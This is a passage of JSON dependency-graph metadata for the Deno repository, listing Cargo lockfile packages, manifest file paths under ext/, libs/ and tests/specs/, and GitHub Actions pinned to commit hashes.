"requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003705,"package_name":"windows_x86_64_gnu","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003706,"package_name":"windows_x86_64_gnullvm","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003707,"package_name":"windows_x86_64_gnullvm","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003708,"package_name":"windows_x86_64_gnullvm","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003709,"package_name":"windows_x86_64_msvc","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003710,"package_name":"windows_x86_64_msvc","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003711,"package_name":"windows_x86_64_msvc","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003712,"package_name":"winnow","ecosystem":"cargo","requirements":"0.6.26","direct":false,"kind":"runtime","optional":false},{"id":25970003713,"package_name":"winnow","ecosystem":"cargo","requirements":"0.7.14","direct":false,"kind":"runtime","optional":false},{"id":25970003714,"package_name":"winreg","ecosystem":"cargo","requirements":"0.50.0","direct":false,"kind":"runtime","optional":false},{"id":25970003715,"package_name":"winreg","ecosystem":"cargo","requirements":"0.52.0","direct":false,"kind":"runtime","optional":false},{"id":25970003716,"package_name":"winres","ecosystem":"cargo","requirements":"0.1.12","direct":false,"kind":"runtime","optional":false},{"id":25970003717,"package_name":"winsafe","ecosystem":"cargo","requirements":"0.0.19","direct":false,"kind":"runtime","optional":false},{"id":25970003718,"package_name":"wit-bindgen","ecosystem":"cargo","requirements":"0.51.0","direct":false,"kind":"runtime","optional":false},{"id":25970003719,"package_name":"wit-bindgen-core","ecosystem":"cargo","requirements":"0.51.0","direct":false,"kind":"runtime","optional":false},{"id":25970003720,"package_name":"wit-bindgen-rt","ecosystem":"cargo","requirements":"0.39.0","direct":false,"kind":"runtime","optional":false},{"id":25970003721,"package_name":"wit-bindgen-rust","ecosystem":"cargo","requirements":"0.51.0","direct":false,"kind":"runtime","optional":false},{"id":25970003722,"package_name":"wit-bindgen-rust-macro","ecosystem":"cargo","requirements":"0.51.0","direct":false,"kind":"runtime","optional":false},{"id":25970003723,"package_name":"wit-component","ecosystem":"cargo","requirements":"0.244.0","direct":false,"kind":"runtime","optional":false},{"id":25970003724,"package_name":"wit-parser","ecosystem":"cargo","requirements":"0.244.0","direct":false,"kind":"runtime","optional":false},{"id":25970003725,"package_name":"write16","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003726,"package_name":"writeable","ecosystem":"cargo","requirements":"0.5.5","direct":false,"kind":"runtime","optional":false},{"id":25970003727,"package_name":"writeable","ecosystem":"cargo","requirements":"0.6.2","direct":false,"kind":"runtime","optional":false},{"id":25970003728,"package_name":"wtf8","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003729,"package_name":"wyz","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970003730,"package_name":"x25519-dalek","ecosystem":"cargo","requirements":"2.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003731,"package_name":"x509-parser","ecosystem":"cargo","requirements":"0.15.1","direct":false,"kind":"runtime","optional":false},{"id":25970003732,"package_name":"xattr","ecosystem":"cargo","requirements":"1.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003733,"package_name":"xml-rs","ecosystem":"cargo","requirements":"0.8.20","direct":false,"kind":"runtime","optional":false},{"id":25970003734,"package_name":"xxhash-rust","ecosystem":"cargo","requirements":"0.8.15","direct":false,"kind":"runtime","optional":false},{"id":25970003735,"package_name":"yaml_parser","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003736,"package_name":"yansi","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003737,"package_name":"yasna","ecosystem":"cargo","requirements":"0.5.2","direct":false,"kind":"runtime","optional":false},{"id":25970003738,"package_name":"yoke","ecosystem":"cargo","requirements":"0.7.4","direct":false,"kind":"runtime","optional":false},{"id":25970003739,"package_name":"yoke","ecosystem":"cargo","requirements":"0.8.2","direct":false,"kind":"runtime","optional":false},{"id":25970003740,"package_name":"yoke-derive","ecosystem":"cargo","requirements":"0.7.4","direct":false,"kind":"runtime","optional":false},{"id":25970003741,"package_name":"yoke-derive","ecosystem":"cargo","requirements":"0.8.2","direct":false,"kind":"runtime","optional":false},{"id":25970003742,"package_name":"zerocopy","ecosystem":"cargo","requirements":"0.7.32","direct":false,"kind":"runtime","optional":false},{"id":25970003743,"package_name":"zerocopy","ecosystem":"cargo","requirements":"0.8.27","direct":false,"kind":"runtime","optional":false},{"id":25970003744,"package_name":"zerocopy-derive","ecosystem":"cargo","requirements":"0.7.32","direct":false,"kind":"runtime","optional":false},{"id":25970003745,"package_name":"zerocopy-derive","ecosystem":"cargo","requirements":"0.8.27","direct":false,"kind":"runtime","optional":false},{"id":25970003746,"package_name":"zerofrom","ecosystem":"cargo","requirements":"0.1.7","direct":false,"kind":"runtime","optional":false},{"id":25970003747,"package_name":"zerofrom-derive","ecosystem":"cargo","requirements":"0.1.7","direct":false,"kind":"runtime","optional":false},{"id":25970003748,"package_name":"zeroize","ecosystem":"cargo","requirements":"1.8.1","direct":false,"kind":"runtime","optional":false},{"id":25970003749,"package_name":"zeroize_derive","ecosystem":"cargo","requirements":"1.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003750,"package_name":"zeromq","ecosystem":"cargo","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970003751,"package_name":"zerotrie","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970003752,"package_name":"zerovec","ecosystem":"cargo","requirements":"0.10.4","direct":false,"kind":"runtime","optional":false},{"id":25970003753,"package_name":"zerovec","ecosystem":"cargo","requirements":"0.11.6","direct":false,"kind":"runtime","optional":false},{"id":25970003754,"package_name":"zerovec-derive","ecosystem":"cargo","requirements":"0.10.3","direct":false,"kind":"runtime","optional":false},{"id":25970003755,"package_name":"zerovec-derive","ecosystem":"cargo","requirements":"0.11.3","direct":false,"kind":"runtime","optional":false},{"id":25970003756,"package_name":"zip","ecosystem":"cargo","requirements":"2.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970003757,"package_name":"zoneinfo64","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003758,"package_name":"zstd","ecosystem":"cargo","requirements":"0.13.2","direct":false,"kind":"runtime","optional":false},{"id":25970003759,"package_name":"zstd-safe","ecosystem":"cargo","requirements":"7.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970003760,"package_name":"zstd-sys","ecosystem":"cargo","requirements":"2.0.15+zstd.1.5.7","direct":false,"kind":"runtime","optional":false},{"id":25970003761,"package_name":"zune-core","ecosystem":"cargo","requirements":"0.4.12","direct":false,"kind":"runtime","optional":false},{"id":25970003762,"package_name":"zune-jpeg","ecosystem":"cargo","requirements":"0.4.13","direct":false,"kind":"runtime","optional":false}]},{"ecosystem":"cargo","filepath":"ext/broadcast_channel/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:22.012Z","updated_at":"2026-08-08T17:28:22.012Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/broadcast_channel/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"ext/console/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:22.327Z","updated_at":"2026-08-08T17:28:22.327Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/console/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"ext/canvas/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:22.239Z","updated_at":"2026-08-08T17:28:22.239Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/canvas/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"ext/ffi/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:23.110Z","updated_at":"2026-08-08T17:28:23.110Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/ffi/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"ext/http/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:23.249Z","updated_at":"2026-08-08T17:28:23.249Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/http/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"ext/rt_helper/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:24.641Z","updated_at":"2026-08-08T17:28:24.641Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/rt_helper/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/lockfile/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:26.991Z","updated_at":"2026-08-08T17:28:26.991Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/lockfile/Cargo.toml","dependencies":[{"id":25970004045,"package_name":"async-executor","ecosystem":"cargo","requirements":"1.13.1","direct":true,"kind":"development","optional":false},{"id":25970004046,"package_name":"futures","ecosystem":"cargo","requirements":"0.3.31","direct":true,"kind":"development","optional":false},{"id":25970004047,"package_name":"futures-lite","ecosystem":"cargo","requirements":"2.6.0","direct":true,"kind":"development","optional":false}]},{"ecosystem":"cargo","filepath":"ext/io/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:23.379Z","updated_at":"2026-08-08T17:28:23.379Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/io/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"ext/webstorage/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:25.478Z","updated_at":"2026-08-08T17:28:25.478Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/webstorage/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/dcore/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:26.350Z","updated_at":"2026-08-08T17:28:26.350Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/dcore/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/bench/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:29.927Z","updated_at":"2026-08-08T17:28:29.927Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/bench/Cargo.toml","dependencies":[]},{"ecosystem":"cpan","filepath":"tests/registry/jsr/@denotest/echo/meta.json","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:32.769Z","updated_at":"2026-08-08T17:28:32.769Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/jsr/@denotest/echo/meta.json","dependencies":[]},{"ecosystem":"cpan","filepath":"tests/registry/jsr/@denotest/types-file/meta.json","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:35.243Z","updated_at":"2026-08-08T17:28:35.243Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/jsr/@denotest/types-file/meta.json","dependencies":[]},{"ecosystem":"deno","filepath":"libs/npm/resolution/tracing/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:36.615Z","updated_at":"2026-08-08T17:28:36.615Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/npm/resolution/tracing/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/add/jsr_with_type_only_import/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:38.443Z","updated_at":"2026-08-08T17:28:38.443Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/add/jsr_with_type_only_import/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/bump_version/workspace_dry_run/a/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:42.044Z","updated_at":"2026-08-08T17:28:42.044Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/bump_version/workspace_dry_run/a/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/bundle/fallible_imports/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:43.801Z","updated_at":"2026-08-08T17:28:43.801Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/bundle/fallible_imports/deno.json","dependencies":[{"id":25970004422,"package_name":"@denotest/fallible-imports","ecosystem":"deno","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"deno","filepath":"tests/specs/check/skip_lib_check/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:55.141Z","updated_at":"2026-08-08T17:28:55.141Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/skip_lib_check/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/compile/workspace/deno.lock","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:29:05.915Z","updated_at":"2026-08-08T17:29:05.915Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/compile/workspace/deno.lock","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/doc/npm_specifier_auto_node_modules/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:10.304Z","updated_at":"2026-08-08T17:29:10.304Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/doc/npm_specifier_auto_node_modules/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/fmt/editorconfig/with_deno_json/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:10.466Z","updated_at":"2026-08-08T17:29:10.466Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/fmt/editorconfig/with_deno_json/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/install/minimum_dependency_age_no_time_refetch/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:21.425Z","updated_at":"2026-08-08T17:29:21.425Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/install/minimum_dependency_age_no_time_refetch/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/link/already_linked/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:24.234Z","updated_at":"2026-08-08T17:29:24.234Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/link/already_linked/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/link/unlink_by_name/pkg/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:24.960Z","updated_at":"2026-08-08T17:29:24.960Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/link/unlink_by_name/pkg/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/lint/lint_plugin_utf16/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:27.776Z","updated_at":"2026-08-08T17:29:27.776Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lint/lint_plugin_utf16/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/lint/workspace/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:29.441Z","updated_at":"2026-08-08T17:29:29.441Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lint/workspace/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/lint/workspace_no_slow_types/b/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:30.070Z","updated_at":"2026-08-08T17:29:30.070Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lint/workspace_no_slow_types/b/deno.json","dependencies":[]},{"ecosystem":"cargo","filepath":"ext/signals/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:24.705Z","updated_at":"2026-08-08T17:28:24.705Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/signals/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/serde_v8/utilities/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:29.517Z","updated_at":"2026-08-08T17:28:29.517Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/serde_v8/utilities/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/util/server/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:31.512Z","updated_at":"2026-08-08T17:28:31.512Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/util/server/Cargo.toml","dependencies":[]},{"ecosystem":"cpan","filepath":"tests/registry/jsr/@denotest/bad-manifest-checksum/meta.json","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:32.080Z","updated_at":"2026-08-08T17:28:32.080Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/jsr/@denotest/bad-manifest-checksum/meta.json","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/ecosystem_compat_test.generated.yml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:07.182Z","updated_at":"2026-08-08T17:28:07.182Z","repository_link":"https://github.com/denoland/deno/blob/main/.github/workflows/ecosystem_compat_test.generated.yml","dependencies":[{"id":25970001021,"package_name":"actions/checkout","ecosystem":"actions","requirements":"de0fac2e4500dabe0009e67214ff5f5447ce83dd","direct":true,"kind":"composite","optional":false},{"id":25970001022,"package_name":"denoland/setup-deno","ecosystem":"actions","requirements":"667a34cdef165d8d2b2e98dde39547c9daac7282","direct":true,"kind":"composite","optional":false},{"id":25970001023,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"a309ff8b426b58ec0e2a45f0f869d46889d02405","direct":true,"kind":"composite","optional":false},{"id":25970001024,"package_name":"google-github-actions/auth","ecosystem":"actions","requirements":"7c6bc770dae815cd3e89ee6cdf493a5fab2cc093","direct":true,"kind":"composite","optional":false},{"id":25970001025,"package_name":"google-github-actions/setup-gcloud","ecosystem":"actions","requirements":"aa5489c8933f4cc7a4f7d45035b3b1440c9c10db","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"cargo","filepath":"ext/napi/sym/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:23.983Z","updated_at":"2026-08-08T17:28:23.983Z","repository_link":"https://github.com/denoland/deno/blob/main/ext/napi/sym/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/core_testing/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:26.214Z","updated_at":"2026-08-08T17:28:26.214Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/core_testing/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/maybe_sync/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:27.094Z","updated_at":"2026-08-08T17:28:27.094Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/maybe_sync/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/ffi/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:30.283Z","updated_at":"2026-08-08T17:28:30.283Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/ffi/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/specs/node/child_process_extra_pipes/test-pipe/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:30.819Z","updated_at":"2026-08-08T17:28:30.819Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/node/child_process_extra_pipes/test-pipe/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/sqlite_extension/Cargo.lock","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:31.099Z","updated_at":"2026-08-08T17:28:31.099Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/sqlite_extension/Cargo.lock","dependencies":[{"id":25970004057,"package_name":"bitflags","ecosystem":"cargo","requirements":"2.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970004058,"package_name":"fallible-iterator","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970004059,"package_name":"fallible-streaming-iterator","ecosystem":"cargo","requirements":"0.1.9","direct":false,"kind":"runtime","optional":false},{"id":25970004060,"package_name":"foldhash","ecosystem":"cargo","requirements":"0.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970004061,"package_name":"hashbrown","ecosystem":"cargo","requirements":"0.15.5","direct":false,"kind":"runtime","optional":false},{"id":25970004062,"package_name":"hashlink","ecosystem":"cargo","requirements":"0.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970004063,"package_name":"libsqlite3-sys","ecosystem":"cargo","requirements":"0.35.0","direct":false,"kind":"runtime","optional":false},{"id":25970004064,"package_name":"pkg-config","ecosystem":"cargo","requirements":"0.3.32","direct":false,"kind":"runtime","optional":false},{"id":25970004065,"package_name":"prettyplease","ecosystem":"cargo","requirements":"0.2.37","direct":false,"kind":"runtime","optional":false},{"id":25970004066,"package_name":"proc-macro2","ecosystem":"cargo","requirements":"1.0.103","direct":false,"kind":"runtime","optional":false},{"id":25970004067,"package_name":"quote","ecosystem":"cargo","requirements":"1.0.42","direct":false,"kind":"runtime","optional":false},{"id":25970004068,"package_name":"rusqlite","ecosystem":"cargo","requirements":"0.37.0","direct":false,"kind":"runtime","optional":false},{"id":25970004069,"package_name":"smallvec","ecosystem":"cargo","requirements":"1.15.1","direct":false,"kind":"runtime","optional":false},{"id":25970004070,"package_name":"syn","ecosystem":"cargo","requirements":"2.0.111","direct":false,"kind":"runtime","optional":false},{"id":25970004071,"package_name":"unicode-ident","ecosystem":"cargo","requirements":"1.0.22","direct":false,"kind":"runtime","optional":false},{"id":25970004072,"package_name":"vcpkg","ecosystem":"cargo","requirements":"0.2.15","direct":false,"kind":"runtime","optional":false}]},{"ecosystem":"cpan","filepath":"tests/registry/jsr/@denotest/multiple-exports/meta.json","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:34.205Z","updated_at":"2026-08-08T17:28:34.205Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/jsr/@denotest/multiple-exports/meta.json","dependencies":[]},{"ecosystem":"cpan","filepath":"tests/registry/jsr/@std/testing/meta.json","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:36.197Z","updated_at":"2026-08-08T17:28:36.197Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/jsr/@std/testing/meta.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/add/unscoped/deno_json/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:39.961Z","updated_at":"2026-08-08T17:28:39.961Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/add/unscoped/deno_json/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/check/erasable_syntax_only/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:52.005Z","updated_at":"2026-08-08T17:28:52.005Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/erasable_syntax_only/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/check/import_meta_no_errors/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:52.124Z","updated_at":"2026-08-08T17:28:52.124Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/import_meta_no_errors/deno.json","dependencies":[{"id":25970004432,"package_name":"@types/node","ecosystem":"deno","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"deno","filepath":"tests/specs/check/package_json_auto_install/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:54.544Z","updated_at":"2026-08-08T17:28:54.544Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/package_json_auto_install/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/check/tsconfig_extends/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:55.707Z","updated_at":"2026-08-08T17:28:55.707Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/tsconfig_extends/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/check/tsconfig_extends_array/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:55.761Z","updated_at":"2026-08-08T17:28:55.761Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/tsconfig_extends_array/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/check/workspace/package-b/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:57.358Z","updated_at":"2026-08-08T17:28:57.358Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/workspace/package-b/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/compile/framework_detection/vite_spa/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:01.138Z","updated_at":"2026-08-08T17:29:01.138Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/compile/framework_detection/vite_spa/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/fmt/workspace/a/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:10.673Z","updated_at":"2026-08-08T17:29:10.673Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/fmt/workspace/a/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/install/catalog_pkg_json/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:15.011Z","updated_at":"2026-08-08T17:29:15.011Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/install/catalog_pkg_json/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/install/global/config_file_workspace_member_import_map_precedence/libs/greet/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:16.134Z","updated_at":"2026-08-08T17:29:16.134Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/install/global/config_file_workspace_member_import_map_precedence/libs/greet/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/install/global/warn_config_file/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:16.290Z","updated_at":"2026-08-08T17:29:16.290Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/install/global/warn_config_file/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/install/minimum_dependency_age_exclude_jsr/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:20.383Z","updated_at":"2026-08-08T17:29:20.383Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/install/minimum_dependency_age_exclude_jsr/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/install/workspace_member_dep_lifecycle_init_cwd/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:22.682Z","updated_at":"2026-08-08T17:29:22.682Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/install/workspace_member_dep_lifecycle_init_cwd/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/jsr/vendor_delete_locked_version_metadata/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:24.023Z","updated_at":"2026-08-08T17:29:24.023Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/jsr/vendor_delete_locked_version_metadata/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/link/unlink_no_match/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:25.878Z","updated_at":"2026-08-08T17:29:25.878Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/link/unlink_no_match/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/lint/jsx/react-jsx/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:26.226Z","updated_at":"2026-08-08T17:29:26.226Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lint/jsx/react-jsx/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/lint/lint_plugin_lifecycle/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:27.309Z","updated_at":"2026-08-08T17:29:27.309Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lint/lint_plugin_lifecycle/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/lockfile/adding_npm_dep/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:30.798Z","updated_at":"2026-08-08T17:29:30.798Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lockfile/adding_npm_dep/deno.json","dependencies":[{"id":25970009221,"package_name":"@denotest/add","ecosystem":"deno","requirements":"1","direct":true,"kind":"runtime","optional":false},{"id":25970009222,"package_name":"@denotest/subtract","ecosystem":"deno","requirements":"1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"deno","filepath":"tests/specs/lockfile/cache_bust_integrity_failure/deno.lock","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:29:31.154Z","updated_at":"2026-08-08T17:29:31.154Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lockfile/cache_bust_integrity_failure/deno.lock","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/lockfile/symlinked_lockfile/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:33.223Z","updated_at":"2026-08-08T17:29:33.223Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/lockfile/symlinked_lockfile/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/node/errors_have_code/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:33.524Z","updated_at":"2026-08-08T17:29:33.524Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/node/errors_h